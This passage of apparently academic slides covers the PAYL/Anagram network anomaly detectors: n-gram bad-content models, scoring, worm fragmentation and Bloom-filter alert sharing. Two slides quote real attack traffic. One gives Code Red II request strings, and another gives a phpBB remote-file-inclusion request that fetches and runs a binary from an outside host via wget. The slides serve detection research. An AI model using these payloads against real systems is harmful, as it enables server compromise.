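def build_bad_content_model(malcode_samples, clean_traffic, n=5):
    """Distinct n-grams from Snort rules / worm samples, minus any n-gram
    that also appears in a small, clean dataset."""
    return distinct_ngrams(malcode_samples, n) - distinct_ngrams(clean_traffic, n)
```

Subtracting the clean-traffic n-grams keeps benign byte sequences that happen to occur inside signatures from polluting the bad content model.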
73
[Figure: the bad content model (purple part): n-grams in Snort rules and collected malware, excluding n-grams in clean traffic]
74
[Figure: two histograms of bad content model matching score (x-axis) vs. percentage of the packets (y-axis): normal content packets (left) and attack packets (right)]
Distribution of bad content matching scores for normal packets (left) and attack packets (right).
The “matching score” is the percentage of the n-grams of a packet that match the bad content model
75
Use of the bad content model
Training: ignore possibly malicious n-grams
Packets with a maximal number of n-grams matching the bad content model are ignored
Packets with a high matching score (>5%) are ignored, since new attacks might reuse old exploit code
Ignoring a few packets is harmless for training
Testing: scoring separates malicious from normal
If a never-seen n-gram also appears in the bad content model, give it a higher weight factor t (t=5 in our experiments)
Score = (N_new + t · N_new_bad) / T, where N_new is the number of never-seen n-grams not in the bad content model, N_new_bad is the number of never-seen n-grams that match it, and T is the total number of n-grams in the packet
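A sketch of this weighted scoring, assuming Score = (N_new + t · N_new_bad) / T with N_new counting never-seen n-grams outside the bad content model (the set arguments are hypothetical):

```python
def anagram_score(packet_ngrams, normal_model, bad_model, t=5):
    """Weighted anomaly score: never-seen n-grams count 1, never-seen
    n-grams that also match the bad content model count t, divided by
    the total number of n-grams in the packet."""
    total = len(packet_ngrams)
    if total == 0:
        return 0.0
    n_new = n_new_bad = 0
    for g in packet_ngrams:
        if g not in normal_model:
            if g in bad_model:
                n_new_bad += 1
            else:
                n_new += 1
    return (n_new + t * n_new_bad) / total
```

Raising t makes packets that reuse known exploit fragments stand out even when most of their content looks ordinary.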
Back
76
Feedback-based learning with shadow servers
Training attacks: an attacker sends malicious data during training time to poison the model
The bad content model cannot guarantee 100% detection
The most reliable way is to use the feedback of a host-based shadow server to supervise the training
Also useful for adaptive learning, to accommodate concept shift
PAYL/Anagram can be used as a first-line classifier to amortize the expensive cost of the shadow server
Only a small percentage of all traffic is sent to the shadow server, instead of all of it
The feedback of the shadow server can improve the accuracy of Anagram
77
Back
78
The structure of the mimicry worm
The maximum possible padding length for a packet of different varieties of this mimicry attack

version          (418, 10)  (418, 100)  (730, 10)  (730, 10)  (730, 100)  (730, 100)
Padding length   125        149         437        461        1167        1191
Each cell in the top row contains a tuple (x, y), representing a variant sequence of y packets of x bytes each.
The second row represents the maximum number of bytes that can be used for padding in each packet.
Return to main
80
Ingress/egress experimental setting
Launched Code Red and Code Red II in our controlled test environment, captured the traces, and merged them into a real web server's trace
Simulates a real worm attacking and propagating on a real server
Interesting behavior observed about the worm:
Propagation occurred with packets fragmented differently than the initial attack packets
Multiple types of fragmentation
81
Different fragmentation for CR and CRII

Code Red II (total 3818 bytes)
Outgoing: 1460, 1460, 898
Incoming: 1448, 1448, 922

Code Red (total 4039 bytes)
Outgoing: 4, 13, 453, 1460, 1460, 649
          4, 375, 1460, 1460, 740
          4, 13, 362, 91, 1460, 1460, 649
Incoming: 1448, 1448, 1143
82
Results of correlation for different metrics

Metric      Detects propagation  False alerts
SE          No                   No
LCS(0.5)    Yes                  No
LCSeq(0.5)  Yes                  No

The number in parentheses is the threshold setting for the similarity score used to decide whether a propagation has occurred
Return to main
83
Data Diversity
Example byte distribution for payload length 536 of port 80 for the three sites.
84
PAYL: for each pair of sites, the 3 packet lengths with the largest Manhattan distance between their byte distributions.

EX, W    (1448, 0.7896)  (1460, 0.7851)  (216, 0.6241)
EX, W1   (1460, 0.9746)  (1448, 0.8731)  (536, 0.5540)
W, W1    (892, 0.7502)   (1460, 0.7456)  (1448, 0.7122)

Anagram: the number of unique 5-grams in datasets W, W1 and EX, and the number of common 5-grams between each pair of sites.

Dataset A     Dataset B    Common 5-grams  Common Perc (%)
EX (509347)   W (953345)   129468          17.5%
EX (509347)   W1 (974292)  99366           13.4%
W1 (974292)   W (953345)   454586          47.2%
Back
85
Testing methodology
Three sets of traffic:
www1 and www2: Columbia web servers, 100 packets each
Malicious packet dataset, 56 packets each
Known ground truth
Arranged into three sets of pairs:
10,000 "good vs. good"
1,540 "bad vs. bad"
5,600 "good vs. bad" between www1 and the malicious dataset
Compare:
Similarity of the approaches
Effectiveness in correlating
Ability to generate signatures
86
Similarity – direct string comparison
[Figure: similarity scores for 80 random "good vs. good" pairs under Raw LCS, Zstr LCS, Raw LCSeq, Raw ED, Manhattan Distance, Zstr LCSeq, and Zstr ED]
High-level view of score similarities
Most of the techniques are similar, except LCS (vulnerable to slight differences)
ED and LCSeq are very similar
N-gram techniques are not included (they don't compute similarity over the entire packet datagram)
Similarity score, 80 random pairs of "good vs. good"
Detail Comparison
Back
87
Similarity comparison (II)
To compare the differences more precisely, normalize and compare the scores:
Compute similarity score vectors V_A, V_B
Match their medians
Scale the ranges proportionally so the min and max values match
The Manhattan distance is then computed between the vectors
Each privacy-enabled technique is compared against Raw-LCSeq (the baseline)
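These normalization steps could be sketched as follows (illustrative; ties and degenerate ranges are handled crudely):

```python
def normalize(scores, ref):
    """Shift `scores` so its median matches that of `ref`, then scale so
    the min and max match those of `ref`."""
    s, r = sorted(scores), sorted(ref)
    med_s, med_r = s[len(s) // 2], r[len(r) // 2]
    shifted = [v - med_s + med_r for v in scores]
    lo_s, hi_s = min(shifted), max(shifted)
    lo_r, hi_r = min(ref), max(ref)
    scale = (hi_r - lo_r) / (hi_s - lo_s) if hi_s > lo_s else 1.0
    return [lo_r + (v - lo_s) * scale for v in shifted]

def manhattan_distance(a, b):
    """Distance between two (aligned) score vectors after normalization."""
    return sum(abs(x - y) for x, y in zip(a, b))
```

After normalization, the Manhattan distance between a technique's score vector and the Raw-LCSeq baseline directly measures how differently the two techniques rank the same pairs.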
88
Similarity of packets (III)

Type   Raw-LCS  Raw-ED  MD     ZStr-LCS  ZStr-LCSeq  ZStr-ED
G-G    .0948    .0336   .0669  .2079     .0794       .0667
B-B    .0508    .0441   .0653  .0399     .0263       .0669
G-B    .0251    .0241   .0110  .0310     .0191       .0233
Unsurprisingly, Raw-ED is closest to Raw-LCSeq
All privacy-preserving methods are close when correlating pairs that include attack traffic; they may be leveraging differences between byte distributions
The Manhattan distance between packet frequency distributions is best
Normalized similarity scores (lower is better)
Back
89
Worm variants – CRII example
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\x0d\n.
GET /notarealfile.idq?UOIRJVFJWPOIVNBUNIVUWIFOJIVNNZCIVIVIGJBMOMKRNVEWIFUVNVGFWERIOUNVUNWIUNFOWIFGITTOOWENVJSNVSFDVIRJGOGTNGTOWGTFGPGLKJFGOIRWTPOIREPTOEIGPOEWKFVVNKFVVSDNVFDSFNKVFKGTRPOPOGOPIRWOIRNNMSKVFPOSVODIOREOITIGTNJGTBNVNFDFKLVSPOERFROGDFGKDFGGOTDNKPRJNJIDH%u1234DSPPOITEBFBWEJFBHREWJFHFRG=bla HTTP/1.0\x0d\n.
[Crandall05]
90
Anagram privacy-preserving cross-site collaboration
The anomalous n-grams of a suspicious payload are stored in a Bloom filter and exchanged among sites
By checking the n-grams of local alerts against the Bloom filter alert, it is easy to tell how similar the alerts are to each other
The common malicious n-grams can be used for general signature generation, even for polymorphic worms
Privacy-preserving with no loss of accuracy
91
Robust Signature Generation
Anagram not only detects suspicious packets, it also identifies the corresponding malicious n-grams!
These n-grams are good targets for further analysis and signature generation
The set of n-grams is order-independent, so attack vector reordering will fail
92
Anagram flattened signature for attack

php attack content:
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User‑Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1;)..

Generated signatures using different N:
N=3: *?ph*bb_*//8*p;wg*n;c*n;./c*n;ec*0YYY;echo|H*26.U*1;).*
N=5: *ums/ad*in/admin_sty*.phpadmin_sty*hp?phpbb_root_path=http://81.174.26.111/cmd*cmd=cd%20/tmp;wget%20216*09.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTT*6.26.Use*5.1;)..*
N=7: *dules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gi*?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/*59.16.26.User-*T 5.1;)..*
Note: “.” for nonprintable characters; “*” represents a wildcard for signature matching
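One way such a flattened signature could be produced (a sketch; the `anomalous` predicate is a hypothetical stand-in for Anagram's per-n-gram decision):

```python
def flatten_signature(payload: bytes, anomalous, n: int = 5) -> bytes:
    """Keep bytes covered by at least one anomalous n-gram; replace each
    maximal run of uncovered bytes with a single '*' wildcard."""
    covered = [False] * len(payload)
    for i in range(len(payload) - n + 1):
        if anomalous(payload[i:i + n]):
            for j in range(i, i + n):
                covered[j] = True
    out, in_gap = bytearray(), False
    for j, keep in enumerate(covered):
        if keep:
            out.append(payload[j])
            in_gap = False
        elif not in_gap:
            out += b"*"
            in_gap = True
    return bytes(out)
```

Larger n covers more context around each anomalous region, which is why the N=7 signature above preserves much longer literal fragments than the N=3 one.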